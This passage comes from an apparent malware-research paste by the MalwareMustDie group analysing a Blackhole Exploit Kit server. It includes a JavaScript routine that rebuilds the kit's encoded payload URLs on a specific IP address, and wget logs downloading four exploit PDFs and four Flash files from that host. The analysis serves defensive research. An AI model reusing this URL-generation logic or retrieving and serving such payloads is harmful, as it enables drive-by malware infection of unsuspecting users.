  903. h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  904. h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  905.  
  906.  
  907. //=============CRACK LOGIC FOR SWF URL==================
  908.  
  909. function x(s){
  910.   d = [];
  911.   for (i = 0; i < s.length; i ++ ){
  912.     k = (s.charCodeAt(i)).toString(33);
  913.     d.push(k);
  914.   }
  915.   ;
  916.   return d.join(":");
  917. }
  918.  
  919. var domain="h00p://46.175.224.21:8080";
  920.  
  921. var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") +   "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
  922. var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
  923. var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
  924. var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
  925.            
  926. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  927.  
  928. // output
  929.  
  930. h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  931. h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  932. h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  933. h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  934.  
  935. //=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
  936.  
  937. //pdf
  938.  
  939. --2013-02-18 15:50:22--  h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  940. Connecting to 46.175.224.21:8080... connected.
  941. h00p request sent, awaiting response... 200 OK
  942. Length: 20161 (20K) [application/pdf]
  943. Saving to: `./pdf1.pdf'
  944. 100%[==============================================================================>] 20,161      32.3K/s   in 0.6s
  945. 2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
  946.  
  947. --2013-02-18 15:50:53--  h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  948. Connecting to 46.175.224.21:8080... connected.
  949. h00p request sent, awaiting response... 200 OK
  950. Length: 11194 (11K) [application/pdf]
  951. Saving to: `./pdf2.pdf'
  952. 100%[==============================================================================>] 11,194      32.5K/s   in 0.3s
  953. 2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
  954.  
  955. --2013-02-18 15:51:22--  h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  956. Connecting to 46.175.224.21:8080... connected.
  957. h00p request sent, awaiting response... 200 OK
  958. Length: 20161 (20K) [application/pdf]
  959. Saving to: `./pdf3.pdf'
  960. 100%[==============================================================================>] 20,161      31.6K/s   in 0.6s
  961. 2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
  962.  
  963. --2013-02-18 15:52:02--  h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  964. Connecting to 46.175.224.21:8080... connected.
  965. h00p request sent, awaiting response... 200 OK
  966. Length: 11160 (11K) [application/pdf]
  967. Saving to: `./pdf4.pdf'
  968. 100%[==============================================================================>] 11,160      34.6K/s   in 0.3s
  969. 2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
  970.  
  971.  
  972. // flash....
  973.  
  974.  
  975. --2013-02-18 15:54:34--  h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  976. Connecting to 46.175.224.21:8080... connected.
  977. h00p request sent, awaiting response... 200 OK
  978. Length: 7981 (7.8K) [text/html]
  979. Saving to: `./flash1.swf'
  980. 100%[==============================================================================>] 7,981       26.7K/s   in 0.3s
  981. 2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
  982.  
  983. --2013-02-18 15:54:58--  h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  984. Connecting to 46.175.224.21:8080... connected.
  985. h00p request sent, awaiting response... 200 OK
  986. Length: 1030 (1.0K) [text/html]
  987. Saving to: `./flash2.swf'
  988. 100%[==============================================================================>] 1,030       --.-K/s   in 0s
  989. 2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
  990.  
  991. --2013-02-18 15:55:14--  h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  992. Connecting to 46.175.224.21:8080... connected.
  993. h00p request sent, awaiting response... 200 OK
  994. Length: 7981 (7.8K) [text/html]
  995. Saving to: `./flash3.swf'
  996. 100%[==============================================================================>] 7,981       25.5K/s   in 0.3s
  997. 2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
  998.  
  999.  
  1000. --2013-02-18 15:57:54--  h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  1001. Connecting to 46.175.224.21:8080... connected.
  1002. h00p request sent, awaiting response... 200 OK
  1003. Length: 1030 (1.0K) [text/html]
  1004. Saving to: `./flash4.swf'
  1005. 100%[==============================================================================>] 1,030       --.-K/s   in 0s
  1006. 2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
  1007.  
  1008.  
  1009. =========================
  1010.  
  1011. It has Geo-IP functions built in in BHEK...
  1012. Reference: http://ondailybasis.com/blog/?p=1483
  1013.  
  1014. =======================-
  1015.  
  1016. ----
  1017. #MalwareMustDie | @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top